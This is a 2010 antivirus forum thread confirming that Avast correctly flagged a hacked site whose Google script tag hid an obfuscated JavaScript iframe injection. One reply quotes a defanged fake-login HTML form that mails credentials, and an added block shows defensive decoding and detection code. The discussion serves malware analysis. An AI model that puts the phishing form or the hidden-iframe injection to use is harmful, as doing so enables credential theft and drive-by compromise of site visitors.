Author Topic: Nerdtests and Avast: Probably F/P?  (Read 8357 times)

Ruuga

  • Guest
Nerdtests and Avast: Probably F/P?
« on: July 07, 2010, 09:17:17 PM »
So today I tried to open this site, but Avast thinks there is a trojan. I'm using Avast 5, but I didn't get the alarm when I was using version 4. Also, Avast sends an alarm if you type the URL into Google. Also, my friend said that he got an alert with Avast 5.
« Last Edit: July 09, 2010, 11:59:37 AM by igor »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
« Last Edit: July 07, 2010, 09:41:18 PM by Pondus »

Online DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88897
  • No support PMs thanks
Re: Nerdtests and Avast: Probably F/P?
« Reply #2 on: July 07, 2010, 10:00:50 PM »
It appears that one of the Google script tags has been hacked (2nd to last in the page code, see image1), inserting a long line of obfuscated JavaScript.

This script, when decoded (image2), creates a hidden iframe tag that tries to open an IP in the Ukraine, which is highly suspect.

So I believe that the detection is good.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Nerdtests and Avast: Probably F/P?
« Reply #3 on: July 08, 2010, 12:02:10 AM »
Hi DavidR,

And what does that long unescape string do? Well, that is hexadecimal-coded JavaScript commands that are decoded along lines such as:
<FORM METHOD="POST" ACTION="some address/form/mailto.cgi" ENCTYPE="x-wXw-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="wXwmalcreant*com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Some Login Hacked! (by OUR INC`s Fake Login)">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="hxtp/etc. etc. ">
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus
« Last Edit: July 08, 2010, 12:08:47 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
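
The triage discussed in replies #2 and #3 (decode the unescape string, look for a hidden iframe, note a raw-IP destination) can be done statically, without running the injected script. This is an added example, not code from the thread or from Avast; the sample tag, the path in.php, the documentation address 192.0.2.10 and all function names are constructed for illustration.

```javascript
// Added example: static triage only, nothing from the page is executed.

// Decode %XX and %uXXXX escapes the way legacy unescape() does, without eval.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Peel nested encoding layers, bounded so hostile input cannot loop forever.
function decodeLayers(s, maxRounds = 5) {
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeEscapes(s);
    if (next === s) break;
    s = next;
  }
  return s;
}

// Read one attribute value from a tag, quoted or unquoted.
function attr(tag, name) {
  const re = new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Report every iframe found inside an unescape("...") literal of the page source.
function findHiddenIframes(pageSource) {
  const findings = [];
  const literal = /unescape\(\s*(["'])(.*?)\1\s*\)/gs;
  for (const [, , encoded] of pageSource.matchAll(literal)) {
    const decoded = decodeLayers(encoded);
    for (const [tag] of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const src = attr(tag, "src") || "";
      const style = (attr(tag, "style") || "").replace(/\s/g, "").toLowerCase();
      const tiny = ["width", "height"].some(n => /^[01](px)?$/i.test(attr(tag, n) || ""));
      const hidden = tiny || /display:none|visibility:hidden/.test(style);
      const rawIp = /^https?:\/\/\d{1,3}(\.\d{1,3}){3}(?=[:\/]|$)/i.test(src);
      findings.push({ src, hidden, rawIp, suspicious: hidden && rawIp });
    }
  }
  return findings;
}

// Constructed sample: a tampered script tag; 192.0.2.10 is a documentation address.
const SAMPLE = '<script>document.write(unescape("%3Ciframe src=%22http://192.0.2.10/in.php%22 ' +
  'width=%220%22 height=%220%22%3E%3C/iframe%3E"));</script>';
```

Calling findHiddenIframes(SAMPLE) returns one finding with hidden, rawIp and suspicious all true; a visible iframe pointing at a hostname is reported but not marked suspicious.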

Online DavidR

Re: Nerdtests and Avast: Probably F/P?
« Reply #4 on: July 08, 2010, 02:19:59 AM »
What it does is shown in the last image and is what I said in the post (which seems to differ from your example): it creates a hidden iframe and connects to an IP in the Ukraine. After that I don't care what it does, just that avast has in my mind done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj]).

Even if your explanation is right, it is still a good detection by avast; I just don't go to any depth when I find what I consider is enough evidence to confirm a good detection.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67195
Re: Nerdtests and Avast: Probably F/P?
« Reply #5 on: July 13, 2010, 03:17:32 AM »
You've received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/
The best things in life are free.

Online DavidR

Re: Nerdtests and Avast: Probably F/P?
« Reply #6 on: July 13, 2010, 05:03:16 AM »
Thanks for the notice, Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D